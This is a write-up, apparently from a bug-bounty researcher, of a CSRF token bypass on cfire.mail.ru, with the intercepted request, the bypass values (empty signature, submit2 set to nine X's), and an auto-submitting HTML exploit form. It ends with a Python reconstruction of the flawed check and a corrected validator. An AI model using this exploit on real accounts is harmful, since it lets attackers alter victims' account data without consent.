While I was pentesting many sub-domains of Mail.Ru at the same time, I came across cfire.mail.ru. Since this one also had a user portal, it caught my eye!
I first started testing for Cross-Site Scripting issues in the different GET/POST parameters. While fuzzing them, I kept Burp Suite's interception ON so it captured every request as an intercepting proxy.
Whilst fuzzing the POST request sent to the /account endpoint, this request came up:
```http
POST /account/ HTTP/1.1
Host: cfire.mail.ru
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://cfire.mail.ru/account/
Cookie: <cookies-here>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

signature=<csrf-token here>&firstname=Hacked&lastname=&bdday=0&bdmonth=0&bdyear=0&postindex=&country=&city=&address=&submit2=<another 9-character csrf-token here>
```
I found that there are two CSRF tokens:
- signature – a long CSRF token
- submit2 – a nine-character token made up of letters and digits
I tried bypassing both CSRF protections by removing both parameters – it didn't work 🙁
After spending some time on it, I removed the value (not the parameter itself) of the signature parameter and replayed the request. It worked!
Now the next target for me was to bypass submit2. I also tried removing the value of submit2, but this time the technique didn't work! So I tried different ways of bypassing it.
After about 15 minutes, I tried replacing the nine-character alphanumeric value of submit2 with nine X characters (i.e. XXXXXXXXX). And guess what? It worked. BOOM! Now I made an HTML exploit for this specific CSRF issue, which looked something like this:
```html
<html>
  <body>
    <form action="https://cfire.mail.ru/account/" method="POST" name="exploit">
      <input type="hidden" name="signature" value="" />
      <input type="hidden" name="firstname" value="Pwn3d" />
      <input type="hidden" name="lastname" value="" />
      <input type="hidden" name="bdday" value="0" />
      <input type="hidden" name="bdmonth" value="0" />
      <input type="hidden" name="bdyear" value="0" />
      <input type="hidden" name="postindex" value="" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="submit2" value="XXXXXXXXX" />
    </form>
    <script>document.exploit.submit()</script>
  </body>
</html>
```
I tried this exploit on different cFire accounts, and it worked! So in simple words: removing the value of signature AND changing the value of submit2 to XXXXXXXXX will bypass both protections.
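To show why the two bypasses above worked and what a correct check looks like, here is an added Python example. It is not code from cfire.mail.ru or from the author of this post; it is a hypothetical reconstruction of a validator with the two weaknesses described (an empty signature skips verification, and submit2 is only checked for length), placed beside a corrected validator that treats both fields as required, binds them to the session, and compares them in constant time. The session store and function names are assumptions made for the example.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> tokens issued to that
# session. Purely illustrative; it is not how the real site stores anything.
SESSIONS = {}


def start_session(session_id):
    """Issue a long 'signature' token and a short 'submit2' token for a session.
    The field names mirror the form in the post; the values are random."""
    SESSIONS[session_id] = {
        "signature": secrets.token_hex(32),        # 64 hex characters
        "submit2": secrets.token_urlsafe(9)[:9],    # 9 characters, like the post
    }
    return SESSIONS[session_id]


def validate_weak(session_id, form):
    """Hypothetical reconstruction of the behaviour observed in the post:
    - signature is only compared when it is non-empty, so an empty value
      skips the check entirely;
    - submit2 is only checked for length (9), never for its actual value."""
    issued = SESSIONS.get(session_id, {})
    signature = form.get("signature", "")
    if signature and signature != issued.get("signature"):
        return False
    return len(form.get("submit2", "")) == 9


def validate_strict(session_id, form):
    """Correct check: the session must exist, both fields must be present,
    and each must equal the value issued to this session (constant-time)."""
    issued = SESSIONS.get(session_id)
    if issued is None:
        return False
    for field in ("signature", "submit2"):
        supplied = form.get(field, "")
        if not supplied:
            return False
        if not hmac.compare_digest(supplied.encode(), issued[field].encode()):
            return False
    return True


# Constructed forged body, matching the post: empty signature, nine X's.
FORGED = {"signature": "", "firstname": "Pwn3d", "submit2": "XXXXXXXXX"}


def demo():
    tokens = start_session("sess-victim")
    genuine = {"signature": tokens["signature"], "submit2": tokens["submit2"]}
    return {
        "weak_accepts_forged": validate_weak("sess-victim", FORGED),
        "weak_accepts_genuine": validate_weak("sess-victim", genuine),
        "strict_accepts_forged": validate_strict("sess-victim", FORGED),
        "strict_accepts_genuine": validate_strict("sess-victim", genuine),
    }


if __name__ == "__main__":
    print(demo())
```

The takeaway for anyone building the server side: a CSRF token is a required credential, not an optional one. Every token field must be present, must match the value stored for the current session, and must be compared with a constant-time function; checking that a field "looks like" a token (right length, right character set) proves nothing, because the attacker chooses the value.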
Thanks for reading till here, I hope you learned something. Happy Hacking!